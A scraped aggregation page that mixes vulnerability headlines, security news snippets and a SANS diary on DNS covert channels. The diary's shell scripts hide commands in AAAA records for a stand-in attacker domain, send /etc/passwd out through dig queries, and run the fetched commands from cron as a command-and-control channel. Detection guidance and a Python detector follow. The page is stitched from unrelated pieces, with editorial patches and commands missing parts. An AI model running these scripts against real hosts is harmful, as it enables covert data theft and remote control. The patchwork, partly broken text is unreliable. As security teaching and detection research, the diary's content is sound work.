Siemens SIMATIC NET PC-Software CVE-2016-5874 Remote Denial of Service Vulnerability
Siemens SINEMA Remote Connect Server CVE-2016-6204 Cross Site Scripting Vulnerability
SIMATIC WinCC CVE-2016-5744 Arbitrary File Read Vulnerability
Multiple Siemens Products Remote Code Execution Vulnerability
libarchive 'archive_write_set_format_iso9660.c' Integer Overflow Vulnerability
ImageMagick 'PNG' File Denial of Service Vulnerability
Little CMS CVE-2013-7455 Double Free Remote Code Execution Vulnerability
(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
IBM WebSphere Application Server Liberty Profile CVE-2016-2923 Information Disclosure Vulnerability
IBM WebSphere Application Server CVE-2016-0359 HTTP Response Splitting Vulnerability

Sometimes, the fierce competition in the booming crypto ransomware market works in the favor of the victims whose priceless data is held hostage. That appears to be what played out on Tuesday when the criminals behind a package known as "Mischa" published what's purported to be the secret crypto keys for the rival Chimera malware.

"Earlier this year we got access to big parts of their deveolpment [sic] system, and included parts of Chimera in our project," the Mischa developers wrote in a message posted to Pastebin. "Additionally we now release about 3500 decryption keys from Chimera."

Translation: As if breaking into the Chimera developers' network and stealing their code wasn't enough of an affront, the competing Mischa gang now claims to have leaked the keys that defang Chimera.


Cross-Site Scripting vulnerability in ColorWay WordPress Theme
Silurus Classifieds XSS Vulnerability
PCRE 'find_fixedlength()' Function Heap Buffer Overflow Vulnerability
PCRE 'match()' Function Stack Buffer Overflow Vulnerability
PCRE CVE-2016-3191 Buffer Overflow Vulnerability
PCRE Regular CVE-2015-8385 Pattern Handling Buffer Overflow Vulnerability


A key guarantee provided by HTTPS encryption is that the addresses of visited websites aren't visible to attackers who may be monitoring an end user's network traffic. Now, researchers have devised an attack that breaks this protection.

The attack can be carried out by operators of just about any type of network, including public Wi-Fi networks, which arguably are the places where Web surfers need HTTPS the most. It works by abusing a feature known as WPAD—short for Web Proxy Autodiscovery—in a way that exposes certain browser requests to attacker-controlled code. The attacker then gets to see the entire URL of every site the target visits. The exploit works against virtually all browsers and operating systems. It will be demonstrated for the first time at next week's Black Hat security conference in Las Vegas in a talk titled Crippling HTTPS with Unholy PAC.

"People rely on HTTPS to secure their communication even when the LAN/Wi-Fi cannot be trusted (think public Wi-Fi/hotels/cafes/airports/restaurants, or compromised LAN in an organization)," Itzik Kotler, cofounder and CTO of security firm SafeBreach and one of the scheduled speakers, wrote in an e-mail. "We show that HTTPS cannot provide security when WPAD is enabled. Therefore, a lot of people are actually exposed to this attack when they engage in browsing via non-trusted networks."


Juniper Junos CVE-2016-1276 Multiple Denial of Service Vulnerabilities
Dropbox 6.4.14 DLL Hijacking Vulnerability
Huawei ISM Professional XSS Vulnerability
Crashing Browsers Remotely via Insecure Search Suggestions

Data exfiltration and command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The bucket chain of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but often valid domain names are rather long, in particular if they are associated with public clouds or content delivery networks. DNSSEC records also tend to trigger some of these signatures.

Traditionally, an infected system will exfiltrate data using A records, and then request new commands to be executed using TXT records. While A records work great to exfiltrate data, TXT records are more problematic as they are less commonly used and tend to stick out more.

Note that we are not interested in implementing a complete IP over DNS tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.

There are a couple of methods that can be used to return more meaningful data than an IPv4 address in a DNS A query response:

  • Additional information: sort of anything goes here, but the recursive DNS server doesn't necessarily pass the information along.
  • The response includes a copy of the query. One could modify the query part of the response (after all, we don't expect the response to be used in the traditional sense).

But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (OK, there is Scapy ... maybe that will be a second diary).

AAAA records, on the other hand, return four times as much data as A records, and by returning multiple AAAA records, we can encode reasonably complex commands. We could do the same with A records, but doing so with AAAA records turns out to be a lot simpler.

First, we need to encode a set of commands in AAAA records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility nsupdate to add the respective records to our zone (the script I am using is shown here):

```sh
#!/bin/sh
# Encode the file given as $1 into AAAA records for a.evilexample.com via nsupdate.
# Restored from the collapsed listing: the '&' in both sed replacements, the record
# name in the prereq/update lines and the serial increment had been lost in extraction.
n=2000                                   # serial number, carried in the first hextet
echo server localhost
echo zone evilexample.com
echo prereq yxrrset a.evilexample.com AAAA
echo update delete a.evilexample.com
echo send
# 14 bytes per xxd line = 28 hex digits = 7 hextets; the serial makes up the 8th
for b in `xxd -p -c 14 $1 | sed 's/..../&:/g' | sed 's/:$//'`
do
  f=$n:$b
  f=`echo $f | sed 's/:..$/&00/'`        # pad a trailing half hextet to 4 hex digits
  f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39`   # pad to 8 hextets
  echo update add a.evilexample.com 10 AAAA $f
  n=`expr $n + 1`
done
echo send
```

Let's encode the following string (in sample.txt):

for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done

This command, once executed on the receiving end, will exfiltrate the content of /etc/passwd.

Next, we use the script above to create the necessary AAAA records. nsupdate will pass the commands to the authoritative name server. dns.key is the update key for the zone you are using (if you configured one).

```sh
./ sample.txt | nsupdate -k dns.key
```

Once this completes, you should see the following AAAA records:

```
$ dig +short AAAA a.evilexample.com
2003:7274:2024:622e:6576:696c:6578:616d
2004:706c:652e:636f:6d3b:2064:6f6e:650a
2000:666f:7220:6220:696e:2060:7878:6420
2001:2d70:202f:6574:632f:7061:7373:7764
2002:603b:2064:6f20:6469:6720:2b73:686f
```

Note how the first two bytes (the first hextet) are used as a serial number, as the order in which the records are returned may change.

On the receiving end (infected system), we can now extract the data with a simple shell script:

```sh
dig +short AAAA | sort -n | cut -f2- -d: | tr -d : | xxd -p -c 14 -r
```

To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you have a command and control channel over AAAA records. Best part: all you need on the infected host is a shell script.

You can find the script above on github:

Why use bash vs. perl/python? Because it works!

How do we detect these covert channels?

The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to send a lot of DNS queries, but other, normal servers will only send a few. You could implement rate limiting on the recursive name server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts.
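As an added example (not code from the diary), the detection side in Python: it counts queries per source host over a constructed resolver log, flags query names whose leftmost label is a long hex string (the A-record exfiltration pattern above), and decodes AAAA answers in the diary's serial-plus-payload layout to test whether they read as text rather than as addresses. The log format, the thresholds and all sample values are assumptions.

```python
import ipaddress
import re
import string
from collections import Counter

# Constructed BIND-style resolver query log (not real traffic). 10.0.0.5 behaves like the
# infected host in the diary: hex data in A-query labels plus AAAA lookups for commands.
SAMPLE_LOG = """\
client 10.0.0.5#4411: query: 726f6f743a783a303a303a726f6f743a2f726f6f74.evilexample.com IN A +
client 10.0.0.5#4412: query: 3a2f62696e2f626173680a6461656d6f6e3a783a31.evilexample.com IN A +
client 10.0.0.5#4413: query: a.evilexample.com IN AAAA +
client 10.0.0.7#5301: query: www.example.org IN A +
client 10.0.0.7#5302: query: mail.example.org IN MX +
"""
# Constructed AAAA answer set in the diary's layout (serial in the first hextet, 14 bytes
# of payload in the remaining seven); deliberately out of order and mixed case.
SAMPLE_AAAA = ["2001:6D20:646E:7320:6368:616E:6E65:6C0A",
               "2000:6563:686f:2068:656c:6c6f:2066:726f"]

QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<type>\w+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{20,}$")
PRINTABLE = set(string.printable.encode())

def parse_queries(log_text):
    """Return (source host, query name, query type) for every query line."""
    return [(m["src"], m["name"], m["type"]) for m in QUERY_RE.finditer(log_text)]

def queries_per_client(log_text):
    """Query volume per source host, the diary's primary detection signal."""
    return Counter(src for src, _, _ in parse_queries(log_text))

def hex_label_queries(log_text):
    """Queries whose leftmost label is a long hex string, i.e. xxd -p output used as a label."""
    return [(src, name) for src, name, _ in parse_queries(log_text)
            if HEX_LABEL_RE.match(name.split(".")[0])]

def decode_aaaa(addrs):
    """Invert the diary's encoding: order by serial hextet, drop it, unhex the other seven.
    .exploded normalises case and undoes any '::' compression applied in transit."""
    hextets = sorted(ipaddress.IPv6Address(a).exploded.split(":") for a in addrs)
    return bytes.fromhex("".join("".join(h[1:]) for h in hextets))

def looks_like_text(data, ratio=0.9):
    """Genuine IPv6 addresses almost never decode to printable ASCII; command payloads do."""
    return bool(data) and sum(b in PRINTABLE for b in data) / len(data) >= ratio
```

Hosts whose count from queries_per_client crosses your threshold, or whose AAAA answers pass looks_like_text, are the ones to pull query logs for.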

Further Reading:


Johannes B. Ullrich, Ph.D.


Jack Johnson (right) is one of the singers in the pop-rap duo "Jack & Jack." (credit: genesiating)

As a new way to connect with his fans, Jack Johnson—one half of the pop-rap duo Jack & Jack, not to be confused with the laid back Hawaiian singer-songwriter of the same name—has spent the last month soliciting social media passwords.

Using the hashtag #HackedByJohnson, the performer has tweeted at his fans to send him their passwords. (Why he didn’t go for the shorter and catchier #JackHack, we’ll never know.) Then, Johnson posts under his fans’ Twitter accounts, leaving a short personalized message, as them.

Here's one example:


GNU glibc CVE-2015-8777 Local Security Bypass Vulnerability
GNU glibc 'misc/hsearch_r.c' Integer Overflow Vulnerability